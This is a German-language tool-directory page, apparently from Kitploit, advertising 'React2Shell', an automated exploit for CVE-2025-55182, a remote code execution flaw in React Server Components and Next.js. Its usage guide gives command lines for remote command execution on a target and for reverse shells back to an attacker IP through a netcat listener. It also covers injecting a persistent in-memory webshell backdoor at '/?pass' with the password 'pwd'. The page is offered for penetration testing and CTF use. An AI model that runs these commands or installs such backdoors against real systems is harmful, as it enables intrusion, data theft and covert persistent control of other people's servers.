Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/lamaper/cve-2025-55182-toolbox
PersistenzmechanismenExploitationWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Automatisiertes Exploitation-Tool für CVE-2025-55182 (React/Next.js RCE) mit Befehlsausführung, Outbound-Erkennung, interaktiver Reverse Shell und persistenter Memory-Webshell-Injektion für autorisierte Penetrationstests und CTF-Challenges.

Repository anzeigen
14vor 8 MonatenNoch nicht geprüft
Teilen

React2Shell: Umfassendes Exploit-Tool für CVE-2025-55182

Autor: lamaper / BITs2Sys

Version: 1.0.1

Lizenz: MIT

📝 Werkzeugbeschreibung

Dieses Tool ist ein automatisiertes Penetrationstest-Tool, das speziell für CVE-2025-55182 (RCE durch Prototype-Pollution in React Server Components / Next.js) entwickelt wurde. Es ist für CTF-Wettbewerbe und autorisierte Sicherheitsdienstprojekte konzipiert und integriert Funktionen wie Schwachstellenverifikation, Outbound-Erkennung, Reverse Shells sowie In-Memory-Webshell-Injektion.

🚀 Kernfunktionen

  • Befehlsausführung mit einem Klick (--cmd) : Nutzt den NEXT_REDIRECT-Ausnahmemechanismus, um Base64-kodierte Befehlsausgabeergebnisse präzise zurückzuliefern.
  • Outbound-Status-Prüfung (--check-outbound) : Automatisierte Tests der Fähigkeit des Zielsystems, auf DNS, HTTP und ICMP zuzugreifen, um die Angriffspfadentscheidung zu unterstützen.
  • Interaktive Reverse Shell (--shell) : Integriert zwei Reverse-Shell-Modi (Bash und Python3) mit asynchroner Ausführung, um HTTP-Request-Hänger zu vermeiden.
  • Persistente In-Memory-Webshell (--inject-ms) : Injiziert eine speicherresidente Webshell durch Hijacking des Node.js http.Server-Event-Dispatch-Mechanismus, hinterlässt keine Dateien und ermöglicht persistente Kontrolle.
  • Interaktionsschnittstelle für In-Memory-Webshell (--ms-cmd) : Ein vom Schwachstellen-Trigger-Pfad unabhängiger Interaktionsmodus; nach erfolgreicher Injektion können Befehle direkt über die Hintertür ausgeführt werden.
  • 🛠️ Installation und Abhängigkeiten

    Dieses Tool basiert auf Python 3 und benötigt nur die Installation der requests-Bibliothek.

    root@kitploit:~
    pip install requests
    

    📖 Benutzerhandbuch

    0. Überprüfen, ob die Schwachstelle existiert

    https://github.com/assetnote/react2shell-scanner ist ein nützliches Erkennungstool.

    1. Grundlegende Befehlsausführung

    Direktes Abrufen von Zielsysteminformationen:

    root@kitploit:~
    python exploit.py --url http://target.com/ --cmd "id"
    python exploit.py --url http://target.com/ --cmd "cat /flag"
    

    2. Outbound-Erkennung

    Vor dem Versuch einer Reverse Shell prüfen, ob das Zielsystem eine Verbindung zum externen Netz herstellen kann:

    root@kitploit:~
    python exploit.py --url http://target.com/ --check-outbound
    

    3. Reverse Shell

    Bash-Modus:

    root@kitploit:~
    # 攻击机执行监听: nc -lvnp 4444
    python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
    

    Python-Modus:

    root@kitploit:~
    python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
    

    4. In-Memory-Webshell-Nutzung (Persistenz)

    Injektion der In-Memory-Webshell:

    root@kitploit:~
    python exploit.py --url http://target.com/ --inject-ms
    

    Befehlsausführung über die In-Memory-Webshell (nach erfolgreicher Injektion):

    root@kitploit:~
    python exploit.py --url http://target.com/ --ms-cmd "whoami"
    

    Hinweis: Der Standard-Mount-Pfad der In-Memory-Webshell ist /?pass, ausgelöst durch POST-Parameter pwd.

    Verbindung über AntSword (China AntSword):

    Verbindungspasswort: pwd, Verbindungsmodus: CMDLINUX

    ⚠️ Haftungsausschluss

    Dieses Tool ist ausschließlich für rechtlich zulässige Sicherheitsforschung, CTF-Wettbewerbe und autorisierte Penetrationstests bestimmt. Die Verwendung für rechtswidrige Angriffe ist strengstens untersagt. Sämtliche Konsequenzen aus der Nutzung dieses Tools trägt allein der Benutzer.


    Tool herunterladen